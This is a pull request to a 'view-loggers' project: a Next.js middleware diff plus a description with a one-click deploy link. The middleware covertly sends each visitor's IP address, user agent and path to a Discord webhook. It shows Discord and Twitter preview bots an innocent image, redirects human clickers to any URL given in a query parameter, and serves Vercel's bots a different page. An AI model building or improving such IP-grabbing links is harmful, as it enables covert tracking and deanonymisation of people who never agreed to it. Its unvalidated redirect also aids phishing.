### PR TITLE
Added query params, cleaned code & UI

### DIFF
--- a/middleware.js
+++ b/middleware.js
@@ -1,29 +1,25 @@
 import { NextRequest, NextResponse, userAgent } from 'next/server';
-
-const webhook = process.env.WEBHOOK_URL // Your webhook URL now is in your project's environment variables.
-
+const webhook = process.env.WEBHOOK_URL;
 export async function middleware(req){
   const ua = userAgent(req)?.ua;
-  if(!ua || ua.startsWith("vercel-")){
-    // Displaying another page for Vercel
-    return NextResponse.rewrite(new URL("/vercel.html",req.url));
-  }
-  const source = ["Mozilla/5.0 (compatible; Discordbot/","Twitterbot/"].find(u=>ua?.startsWith(u))
-  const page = req.url.split("/").slice(-1)[0]
-  await fetch(webhook,{body:JSON.stringify({
-    embeds:[{
-      title:"Triggered view-logger",
-      description:(source ? "Source user-agent: "+ua : "It was loaded by an user (or an user on Discord)."),
-      footer:{
-        text:"Requested page: "+page.slice(0,500),
-      },
+  const discordbot = ["Mozilla/5.0 (compatible; Discordbot/", "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.6; rv:92.0) Gecko/20100101 Firefox/92.0", "Twitterbot/"].find(u=>ua?.startsWith(u));
+  const vercelbot = ["vercel-", "Vercelbot/"].find(u => ua?.startsWith(u));
+  const path = req.nextUrl.pathname;
+  const favicon = path.startsWith("/favicon");
+  const img = req.nextUrl.searchParams.get('img');
+  const redirect = req.nextUrl.searchParams.get('red');
+  const body = {
+    "embeds":[{
+      "title":"Triggered view-logger V2",
+      "fields":[{name:"Source", value:(discordbot ? "Discord" : "User"), inline: true},{name:"Path", value: path, inline: true},{name:"IP", value: req.ip, inline: true}, {name: "User agent", value: ua, inline: false}]
     }],
-  }),headers:{"content-type":"application/json"},method:"POST"})
-  if(source){
-    // Return the image.
-    return NextResponse.rewrite(new URL("/mini.png",req.url))
-  }else{
-    // Make a message for whoever takes the risk to directly click.
-    return NextResponse.rewrite(new URL("/page.html",req.url));
-  }
+  };
+  
+  if(vercelbot) return NextResponse.rewrite(new URL("/vercel.html",req.url));
+  if(favicon) return;
+  
+  await fetch(webhook,{body: JSON.stringify(body), headers:{"content-type":"application/json"}, method:"POST"});
+  
+  if(discordbot) return img ? NextResponse.rewrite(new URL(img.startsWith("https://") ? img : ("https://" + img))) : NextResponse.rewrite(new URL("/mini.png", req.url));
+  return redirect ? NextResponse.redirect(new URL(redirect.startsWith("https://") ? redirect : ("https://" + redirect))) : NextResponse.rewrite(new URL("/page.html", req.url));
 }


### PR DESCRIPTION
Accidentally deleted the old one, I'll keep this PR open in case someone wants to use it, 
## You can use [this link](https://vercel.com/new/clone?repository-url=https%3A%2F%2Fgithub.com%2Flulu5239%2Fview-loggers%2Fpull%2F12&env=WEBHOOK_URL&envDescription=Paste%20your%20Discord%2FGuilded%20Webhook%20URL) to deploy it to vercel, its the same steps as deploying it normally

### 1. Added optional query parameters: 
   - red=link will redirect to such link once clicked on
   - img=image link will show the image instead of the pixel 
### 2. Added UA:
   - Noticed that it wouldnt load images without another ua set to return the image, so it would bug
   - Added vercelbot ua
### 3. Cleaned code&UI:
   - Modified multiple code parts, such as using req.nextUrl.pathname instead of req.url.slice("/"). 
   - Modified the embed to send fields, instead of footer& description
### 4. Silenced Vercel & /favicon hits